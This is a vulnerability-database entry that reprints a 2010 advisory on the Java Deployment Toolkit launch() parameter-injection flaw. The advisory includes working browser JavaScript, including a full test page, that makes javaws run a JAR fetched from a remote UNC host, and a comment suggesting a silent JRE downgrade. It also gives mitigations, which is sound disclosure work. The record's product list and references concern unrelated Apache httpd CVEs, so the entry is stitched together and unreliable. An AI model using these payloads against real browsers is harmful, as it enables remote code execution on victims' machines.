vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.32 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.31 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.30 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.29 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.28 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.27 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.26 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.25 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.24 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.23 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.22 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.20 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.19 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.18 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.17 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.16 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.15 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache mac | scope: | eq | version: | 1.3.14 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.14 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.13 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.12 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.11 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.10 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.9 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.8 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache -dev | scope: | eq | version: | 1.3.7 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.7 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.6 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.5 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.4 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.3 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.2 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.1 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.3.38-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.3.3 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.2.7-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.2.6-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.2.5-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.21 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.20 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.19 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.18 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.17 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.16 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.2.15-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 2.2.1 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.0.64-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.0.62-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.0.61-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 2.0.60-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache 1.3.40-dev | scope: | - | version: | - | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | eq | version: | 1.3.35 | Trust: 0.3 |
vendor: | ibm | model: | http server | scope: | ne | version: | 7.0.0.21 | Trust: 0.3 |
vendor: | hp | model: | system management homepage | scope: | ne | version: | 7.0 | Trust: 0.3 |
vendor: | apache | model: | software foundation apache | scope: | ne | version: | 2.2.22 | Trust: 0.3 |
EXPLOIT
Java Deployment Toolkit Performs Insufficient Validation of Parameters
-------------------------------------------------------------------------
Java Web Start (henceforth, jws) provides java developers with a way to let
users launch and install their applications using a URL to a Java Networking
Launching Protocol (.jnlp) file (essentially some xml describing the
program).
Since Java 6 Update 10, Sun has distributed an NPAPI plugin and ActiveX control
called "Java Deployment Toolkit" to provide developers with a simpler method
of distributing their applications to end users. This toolkit is installed by
default with the JRE and marked safe for scripting.
The launch() method provided by the toolkit object accepts a URL string, which
it passes to the registered handler for JNLP files, which by default is the
javaws utility.
$ cmd /c ver
Microsoft Windows XP [Version 5.1.2600]
$ java -version
java version "1.6.0_19"
Java(TM) SE Runtime Environment (build 1.6.0_19-b04)
Java HotSpot(TM) Client VM (build 16.2-b04, mixed mode, sharing)
$ cat /proc/registry/HKEY_LOCAL_MACHINE/SOFTWARE/Classes/JNLPFile/Shell/Open/Command/\@
"C:\Program Files\Java\jre6\bin\javaws.exe" "%1"
The toolkit provides only minimal validation of the URL parameter, allowing us
to pass arbitrary parameters to the javaws utility, which provides enough
functionality via command line arguments to allow this error to be exploited.
The simplicity with which this error can be discovered has convinced me
that releasing this document is in the best interest of everyone except
the vendor.
--------------------
Affected Software
------------------------
All versions since Java SE 6 update 10 for Microsoft Windows are believed to be
affected by this vulnerability. Disabling the java plugin is not sufficient to
prevent exploitation, as the toolkit is installed independently.
http://java.sun.com/javase/6/docs/technotes/guides/jweb/deployment_advice.html
I believe non-Windows installations are unaffected.
--------------------
Consequences
-----------------------
Exploitation of this issue is not terribly exciting, but is potentially of high
enough impact to merit explanation. The javaws application supports the
following command line parameters.
$ javaws -help
Usage: javaws [run-options] <jnlp-file>
javaws [control-options]
where run-options include:
-verbose display additional output
-offline run the application in offline mode
-system run the application from the system cache only
-Xnosplash run without showing a splash screen
-J<option> supply option to the vm
-wait start java process and wait for its exit
control-options include:
-viewer show the cache viewer in the java control panel
-uninstall remove all applications from the cache
-uninstall <jnlp-file> remove the application from the cache
-import [import-options] <jnlp-file> import the application to the cache
import-options include:
-silent import silently (with no user interface)
-system import application into the system cache
-codebase <url> retrieve resources from the given codebase
-shortcut install shortcuts as if user allowed prompt
-association install associations as if user allowed prompt
Perhaps the most interesting of these is -J, and the obvious attack is simply
to add -jar followed by an attacker controlled UNC path to the jvm command
line, which I've demonstrated below. Other attacks are clearly possible, but
this is sufficient to demonstrate the problem.
In order to trigger this attack in Internet Explorer, an attacker would use a
code sequence like this
/* ... */
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
/* ... */
Or, for Mozilla Firefox
/* ... */
var o = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit"
document.body.appendChild(o);
o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
/* ... */
Please note, at some point the registered MIME type was changed to
application/java-deployment-toolkit, please verify which type applies to
your users when verifying any mitigation implemented has been effective (the
simplest way would be to look at the output of about:plugins on a reference
machine).
A harmless demonstration is provided below.
http://lock.cmpxchg8b.com/bb5eafbc6c6e67e11c4afc88b4e1dd22/testcase.html
<html>
<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
<script>
// Tavis Ormandy <taviso@sdf.lonestar.org>, April 2010
var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";
if (window.navigator.appName == "Microsoft Internet Explorer") {
var o = document.createElement("OBJECT");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
// Trigger the bug
o.launch(u);
} else {
// Mozilla
var o = document.createElement("OBJECT");
var n = document.createElement("OBJECT");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
n.type = "application/java-deployment-toolkit";
document.body.appendChild(o);
document.body.appendChild(n);
// Test both MIME types
try {
// Old type
o.launch(u);
} catch (e) {
// New type
n.launch(u);
}
}
// Bonus Vulnerability, why not downgrade victim to a JRE vulnerable to
// this classic exploit?
// http://sunsolve.sun.com/search/document.do?assetkey=1-66-244991-1
// o.installJRE("1.4.2_18");
</script>
</body>
</html>
-------------------
Mitigation
-----------------------
If you believe your users may be affected, you should consider applying one of
the workarounds described below as a matter of urgency.
- Internet Explorer users can be protected by temporarily setting the killbit
on CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA. To the best of my knowledge, the
deployment toolkit is not in widespread usage and is unlikely to impact end
users.
- Mozilla Firefox and other NPAPI based browser users can be protected using
File System ACLs to prevent access to npdeploytk.dll. These ACLs can also be
managed via GPO.
Detailed documentation on killbits is provided by Microsoft here
http://support.microsoft.com/kb/240797
Domain administrators can deploy killbits and File System ACLs using GPOs, for
more information on Group Policy, see Microsoft's Group Policy site, here
http://technet.microsoft.com/en-us/windowsserver/bb310732.aspx
You may be tempted to kill the HKLM\...\JNLPFile\Shell\Open\Command key, but
the author does not believe this is sufficient, as the plugin also provides
enough functionality to install and downgrade JRE installations without
prompting (seriously). However, if none of your affected users are local
Administrators, this solution may work (untested).
As always, if you do not require this feature, consider permanently disabling
it in order to reduce attack surface.
-------------------
Solution
-----------------------
Sun has been informed about this vulnerability, however, they informed me they
do not consider this vulnerability to be of high enough priority to break their
quarterly patch cycle.
For various reasons, I explained that I did did not agree, and intended to
publish advice to temporarily disable the affected control until a solution is
available.
-------------------
Credit
-----------------------
This bug was discovered by Tavis Ormandy.
This work is my own, and all of the opinions expressed are mine, not my
employers or anybody elses (I added this for you, Dan. Thanks ;-)).
-------------------
Greetz
-----------------------
Greetz to Julien, Neel, Redpig, Lcamtuf, Spoonm, Skylined, asiraP, LiquidK,
ScaryBeasts, Headhntr, Jagger, Sami and Roach.
Some very elite friends have started a consultancy called inverse path, you
should really hire them.
http://www.inversepath.com/
-------------------
References
-----------------------
- Deploying Java with JNLP, Sun Microsystems.
http://java.sun.com/developer/technicalArticles/Programming/jnlp/
-------------------
Notes
-----------------------
My advisories are intended to be consumed by a technical audience of security
professionals and systems administrators who are familiar with the principal
for which the mailing list you have subscribed to is named. If you do not fall
into this category, you can get up to speed by reading this accessible and
balanced essay on the disclosure debate by Bruce Schneier.
http://www.schneier.com/crypto-gram-0111.html#1
Some of us would appreciate it if you made the effort to research and
understand the issues involved before condemning us :-)
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 1.0
PRICE
free
Trust: 1.0
TYPE
Performs Insufficient Validation of Parameters
Trust: 1.0
TAGS
tag: | exploit | Trust: 0.5 |
tag: | remote | Trust: 0.5 |
tag: | protocol | Trust: 0.5 |
tag: | proof of concept | Trust: 0.5 |
tag: | info disclosure | Trust: 0.5 |
CREDITS
Tavis Ormandy
Trust: 1.0
EXTERNAL IDS
db: | NVD | id: | CVE-2010-0886 | Trust: 1.0 |
db: | EXPLOIT-DB | id: | 12117 | Trust: 1.0 |
db: | NVD | id: | CVE-2012-0053 | Trust: 0.8 |
db: | JUNIPER | id: | JSA10642 | Trust: 0.6 |
db: | JUNIPER | id: | JSA10585 | Trust: 0.6 |
db: | PACKETSTORM | id: | 109284 | Trust: 0.5 |
db: | HITACHI | id: | HS12-033 | Trust: 0.3 |
db: | BID | id: | 51706 | Trust: 0.3 |
db: | JUNIPER | id: | JSA10658 | Trust: 0.3 |
db: | NVD | id: | CVE-2011-3368 | Trust: 0.3 |
db: | BID | id: | 49957 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2010-0886 | Trust: 1.0 |
url: | http://support.avaya.com/css/p8/documents/100158872 | Trust: 0.6 |
url: | http://h20565.www2.hp.com/portal/site/hpsc/public/kb/docdisplay/?docid=emr_na-c03231301&ac.admitted=1332965374461.876444892.492883150 | Trust: 0.6 |
url: | http://httpd.apache.org/ | Trust: 0.6 |
url: | http://kb.juniper.net/infocenter/index?page=content&id=jsa10642&cat=sirt_1&actp=list | Trust: 0.6 |
url: | http://kb.juniper.net/infocenter/index?page=content&id=jsa10585 | Trust: 0.6 |
url: | https://nvd.nist.gov/vuln/detail/cve-2012-0053 | Trust: 0.5 |
url: | http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004302 | Trust: 0.3 |
url: | https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03691745 | Trust: 0.3 |
url: | http://httpd.apache.org/security/vulnerabilities_20.html | Trust: 0.3 |
url: | http://www.sophos.com/en-us/support/knowledgebase/119773.aspx | Trust: 0.3 |
url: | http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15273.html | Trust: 0.3 |
url: | http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03315912 | Trust: 0.3 |
url: | http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03360041 | Trust: 0.3 |
url: | http://mail-archives.apache.org/mod_mbox/httpd-announce/201307.mbox/%3c20130710124920.2b8793ed.wrowe%40rowe-clan.net%3e | Trust: 0.3 |
url: | http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities | Trust: 0.3 |
url: | https://h20565.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?javax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01&javax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigational | Trust: 0.3 |
url: | http://www.fujitsu.com/global/support/software/security/products-f/interstage-201203e.html | Trust: 0.3 |
url: | http://www.xerox.com/download/security/security-bulletin/16aeb-4cd3628b94080/cert_xrx12-009_v1.1.pdf | Trust: 0.3 |
url: | http://httpd.apache.org/security/vulnerabilities_22.html | Trust: 0.3 |
url: | http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs12-033/index.html | Trust: 0.3 |
url: | http://support.avaya.com/css/p8/documents/100157326 | Trust: 0.3 |
url: | http://www.fujitsu.com/global/support/software/security/products-f/interstage-201104e.html | Trust: 0.3 |
url: | http://support.avaya.com/css/p8/documents/100151220 | Trust: 0.3 |
url: | http://kb.juniper.net/infocenter/index?page=content&id=jsa10658&cat=sirt_1&actp=list | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=nas2b7c57b1f1035675186257927003c8d48 | Trust: 0.3 |
url: | http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html | Trust: 0.3 |
url: | http://seclists.org/fulldisclosure/2011/oct/232 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg1pm48384 | Trust: 0.3 |
url: | https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03517954&ac.admitted=1349807398574.876444892.199480143 | Trust: 0.3 |
url: | http://www-01.ibm.com/support/docview.wss?uid=swg27014506 | Trust: 0.3 |
url: | http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html | Trust: 0.3 |
url: | http://www.xerox.com/download/security/security-bulletin/12047-4e4eed8d42ca6/cert_xrx13-007_v1.0.pdf | Trust: 0.3 |
url: | http://support.avaya.com/css/p8/documents/100152144 | Trust: 0.3 |
SOURCES
db: | BID | id: | 51706 |
db: | BID | id: | 49957 |
db: | PACKETSTORM | id: | 109284 |
db: | EXPLOIT-DB | id: | 12117 |
LAST UPDATE DATE
2023-05-30T11:42:39.122000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 51706 | date: | 2015-04-13T21:30:00 |
db: | BID | id: | 49957 | date: | 2015-05-07T17:07:00 |
SOURCES RELEASE DATE
db: | BID | id: | 51706 | date: | 2012-01-23T00:00:00 |
db: | BID | id: | 49957 | date: | 2011-10-05T00:00:00 |
db: | PACKETSTORM | id: | 109284 | date: | 2012-01-31T11:11:11 |
db: | EXPLOIT-DB | id: | 12117 | date: | 2010-04-09T00:00:00 |